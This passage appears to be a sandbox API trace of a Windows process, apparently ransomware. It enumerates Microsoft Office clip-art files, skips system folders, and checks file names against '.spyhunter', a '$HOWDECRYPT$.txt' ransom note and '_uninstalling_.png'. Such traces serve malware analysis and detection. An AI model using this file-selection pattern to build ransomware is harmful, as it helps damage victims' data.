returned -1 [0096.478] lstrlenW (lpString="Windows") returned 7 [0096.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.478] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.478] lstrlenW (lpString="System Volume Information") returned 25 [0096.478] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\..") returned 48 [0096.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.478] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0096.478] lstrcmpiW (lpString1="PUB60COR", lpString2="Windows") returned -1 [0096.478] lstrlenW (lpString="Windows") returned 7 [0096.478] lstrcmpiW (lpString1="PUB60COR", lpString2="$Recycle.bin") returned 1 [0096.478] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.478] lstrcmpiW (lpString1="PUB60COR", lpString2="System Volume Information") returned -1 [0096.478] lstrlenW (lpString="System Volume Information") returned 25 [0096.478] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 54 [0096.478] lstrcmpW (lpString1="PUB60COR", lpString2=".") returned 1 [0096.478] lstrcmpW (lpString1="PUB60COR", lpString2="..") returned 1 [0096.478] GetProcessHeap () returned 0x2c0000 [0096.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0096.479] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*") returned 56 [0096.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0096.794] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.794] lstrlenW (lpString="Windows") returned 7 [0096.794] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.794] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.795] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.795] lstrlenW (lpString="System Volume Information") returned 25 [0096.795] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\.") returned 56 [0096.795] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.795] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.797] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.797] lstrlenW (lpString="Windows") returned 7 [0096.797] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.797] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.798] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.798] lstrlenW (lpString="System Volume Information") returned 25 [0096.798] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\..") returned 57 [0096.798] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.798] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.798] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.798] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="Windows") returned -1 [0096.798] lstrlenW (lpString="Windows") returned 7 [0096.798] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="$Recycle.bin") returned 1 [0096.798] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.798] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="System Volume Information") returned -1 [0096.798] lstrlenW (lpString="System Volume Information") returned 25 [0096.798] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 67 [0096.798] StrStrIW (lpFirst="AG00004_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.798] lstrcmpW (lpString1="AG00004_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.798] lstrcmpW (lpString1="AG00004_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.798] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 67 [0096.798] GetProcessHeap () returned 0x2c0000 [0096.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358d60 [0096.798] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c8) returned 0x2c310e0 [0096.798] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.798] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="Windows") returned -1 [0096.798] lstrlenW (lpString="Windows") returned 7 [0096.799] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="$Recycle.bin") returned 1 [0096.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.799] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="System Volume Information") returned -1 [0096.799] lstrlenW (lpString="System Volume Information") returned 25 [0096.799] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 67 [0096.799] StrStrIW (lpFirst="AG00011_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.799] lstrcmpW (lpString1="AG00011_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.799] lstrcmpW (lpString1="AG00011_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 67 [0096.799] GetProcessHeap () returned 0x2c0000 [0096.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358060 [0096.799] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d0) returned 0x2c310e0 [0096.799] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.799] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="Windows") returned -1 [0096.799] lstrlenW (lpString="Windows") returned 7 [0096.799] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="$Recycle.bin") returned 1 [0096.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.799] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="System Volume Information") returned -1 [0096.799] lstrlenW (lpString="System Volume Information") returned 25 [0096.799] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 67 [0096.799] StrStrIW (lpFirst="AG00021_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.799] lstrcmpW (lpString1="AG00021_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.799] lstrcmpW (lpString1="AG00021_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 67 [0096.800] GetProcessHeap () returned 0x2c0000 [0096.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358610 [0096.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d8) returned 0x2c310e0 [0096.800] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.800] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="Windows") returned -1 [0096.800] lstrlenW (lpString="Windows") returned 7 [0096.800] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="$Recycle.bin") returned 1 [0096.800] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.800] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="System Volume Information") returned -1 [0096.800] lstrlenW (lpString="System Volume Information") returned 25 [0096.800] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 67 [0096.800] StrStrIW (lpFirst="AG00037_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.800] lstrcmpW (lpString1="AG00037_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.800] lstrcmpW (lpString1="AG00037_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 67 [0096.800] GetProcessHeap () returned 0x2c0000 [0096.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358200 [0096.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0096.800] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.800] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="Windows") returned -1 [0096.800] lstrlenW (lpString="Windows") returned 7 [0096.800] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="$Recycle.bin") returned 1 [0096.800] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.801] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="System Volume Information") returned -1 [0096.801] lstrlenW (lpString="System Volume Information") returned 25 [0096.801] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 67 [0096.801] StrStrIW (lpFirst="AG00038_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.801] lstrcmpW (lpString1="AG00038_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.801] lstrcmpW (lpString1="AG00038_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.801] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 67 [0096.801] GetProcessHeap () returned 0x2c0000 [0096.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3582d0 [0096.801] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0096.801] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.801] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="Windows") returned -1 [0096.801] lstrlenW (lpString="Windows") returned 7 [0096.801] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="$Recycle.bin") returned 1 [0096.801] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.801] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="System Volume Information") returned -1 [0096.801] lstrlenW (lpString="System Volume Information") returned 25 [0096.801] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 67 [0096.801] StrStrIW (lpFirst="AG00040_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.801] lstrcmpW (lpString1="AG00040_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.801] lstrcmpW (lpString1="AG00040_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.801] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 67 [0096.801] GetProcessHeap () returned 0x2c0000 [0096.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358130 [0096.802] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0096.802] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.802] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="Windows") returned -1 [0096.802] lstrlenW (lpString="Windows") returned 7 [0096.802] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="$Recycle.bin") returned 1 [0096.802] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.802] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="System Volume Information") returned -1 [0096.802] lstrlenW (lpString="System Volume Information") returned 25 [0096.802] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 67 [0096.802] StrStrIW (lpFirst="AG00052_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.802] lstrcmpW (lpString1="AG00052_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.802] lstrcmpW (lpString1="AG00052_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.802] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 67 [0096.802] GetProcessHeap () returned 0x2c0000 [0096.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358c90 [0096.802] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0096.802] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.802] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="Windows") returned -1 [0096.802] lstrlenW (lpString="Windows") returned 7 [0096.802] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="$Recycle.bin") returned 1 [0096.802] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.803] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="System Volume Information") returned -1 [0096.803] lstrlenW (lpString="System Volume Information") returned 25 [0096.803] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 67 [0096.803] StrStrIW (lpFirst="AG00057_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.803] lstrcmpW (lpString1="AG00057_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.803] lstrcmpW (lpString1="AG00057_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.803] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 67 [0096.803] GetProcessHeap () returned 0x2c0000 [0096.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3586e0 [0096.803] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0096.804] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.804] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="Windows") returned -1 [0096.804] lstrlenW (lpString="Windows") returned 7 [0096.804] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="$Recycle.bin") returned 1 [0096.804] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.804] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="System Volume Information") returned -1 [0096.804] lstrlenW (lpString="System Volume Information") returned 25 [0096.804] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 67 [0096.804] StrStrIW (lpFirst="AG00090_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.804] lstrcmpW (lpString1="AG00090_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.804] lstrcmpW (lpString1="AG00090_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.804] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 67 [0096.804] GetProcessHeap () returned 0x2c0000 [0096.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3587b0 [0096.804] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0096.804] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.804] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="Windows") returned -1 [0096.804] lstrlenW (lpString="Windows") returned 7 [0096.804] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="$Recycle.bin") returned 1 [0096.804] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.804] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="System Volume Information") returned -1 [0096.804] lstrlenW (lpString="System Volume Information") returned 25 [0096.804] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 67 [0096.804] StrStrIW (lpFirst="AG00092_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.805] lstrcmpW (lpString1="AG00092_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.805] lstrcmpW (lpString1="AG00092_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.805] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 67 [0096.805] GetProcessHeap () returned 0x2c0000 [0096.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358880 [0096.805] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0096.805] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.805] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="Windows") returned -1 [0096.805] lstrlenW (lpString="Windows") returned 7 [0096.805] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="$Recycle.bin") returned 1 [0096.805] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.805] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="System Volume Information") returned -1 [0096.805] lstrlenW (lpString="System Volume Information") returned 25 [0096.805] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 67 [0096.805] StrStrIW (lpFirst="AG00103_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.805] lstrcmpW (lpString1="AG00103_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.805] lstrcmpW (lpString1="AG00103_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.805] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 67 [0096.805] GetProcessHeap () returned 0x2c0000 [0096.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358950 [0096.805] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0096.805] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.805] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="Windows") returned -1 [0096.806] lstrlenW (lpString="Windows") returned 7 [0096.806] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="$Recycle.bin") returned 1 [0096.806] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.806] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="System Volume Information") returned -1 [0096.806] lstrlenW (lpString="System Volume Information") returned 25 [0096.806] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 67 [0096.806] StrStrIW (lpFirst="AG00120_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.806] lstrcmpW (lpString1="AG00120_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.806] lstrcmpW (lpString1="AG00120_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.806] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 67 [0096.806] GetProcessHeap () returned 0x2c0000 [0096.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358a20 [0096.806] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1520) returned 0x2c310e0 [0096.806] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.806] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="Windows") returned -1 [0096.806] lstrlenW (lpString="Windows") returned 7 [0096.806] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="$Recycle.bin") returned 1 [0096.806] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.806] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="System Volume Information") returned -1 [0096.806] lstrlenW (lpString="System Volume Information") returned 25 [0096.806] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 67 [0096.806] StrStrIW (lpFirst="AG00126_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.806] lstrcmpW (lpString1="AG00126_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.806] lstrcmpW (lpString1="AG00126_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 67 [0096.807] GetProcessHeap () returned 0x2c0000 [0096.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358af0 [0096.807] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0096.807] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.807] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="Windows") returned -1 [0096.807] lstrlenW (lpString="Windows") returned 7 [0096.807] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="$Recycle.bin") returned 1 [0096.807] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.807] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="System Volume Information") returned -1 [0096.807] lstrlenW (lpString="System Volume Information") returned 25 [0096.807] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 67 [0096.807] StrStrIW (lpFirst="AG00129_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.807] lstrcmpW (lpString1="AG00129_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.807] lstrcmpW (lpString1="AG00129_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 67 [0096.807] GetProcessHeap () returned 0x2c0000 [0096.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358bc0 [0096.807] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0096.807] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.807] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="Windows") returned -1 [0096.807] lstrlenW (lpString="Windows") returned 7 [0096.807] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="$Recycle.bin") returned 1 [0096.807] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.808] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="System Volume Information") returned -1 [0096.808] lstrlenW (lpString="System Volume Information") returned 25 [0096.808] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 67 [0096.808] StrStrIW (lpFirst="AG00130_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.808] lstrcmpW (lpString1="AG00130_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.808] lstrcmpW (lpString1="AG00130_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.808] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 67 [0096.808] GetProcessHeap () returned 0x2c0000 [0096.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358e30 [0096.808] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0096.808] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.808] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="Windows") returned -1 [0096.808] lstrlenW (lpString="Windows") returned 7 [0096.808] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="$Recycle.bin") returned 1 [0096.808] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.808] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="System Volume Information") returned -1 [0096.808] lstrlenW (lpString="System Volume Information") returned 25 [0096.808] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 67 [0096.808] StrStrIW (lpFirst="AG00135_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.809] lstrcmpW (lpString1="AG00135_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.809] lstrcmpW (lpString1="AG00135_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 67 [0096.809] GetProcessHeap () returned 0x2c0000 [0096.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3590a0 [0096.809] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0096.809] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.809] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="Windows") returned -1 [0096.809] lstrlenW (lpString="Windows") returned 7 [0096.809] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="$Recycle.bin") returned 1 [0096.809] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.809] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="System Volume Information") returned -1 [0096.809] lstrlenW (lpString="System Volume Information") returned 25 [0096.809] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 67 [0096.809] StrStrIW (lpFirst="AG00139_.GIF", lpSrch=".spyhunter") returned 0x0 [0096.809] lstrcmpW (lpString1="AG00139_.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.809] lstrcmpW (lpString1="AG00139_.GIF", lpString2="_uninstalling_.png") returned 1 [0096.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 67 [0096.809] GetProcessHeap () returned 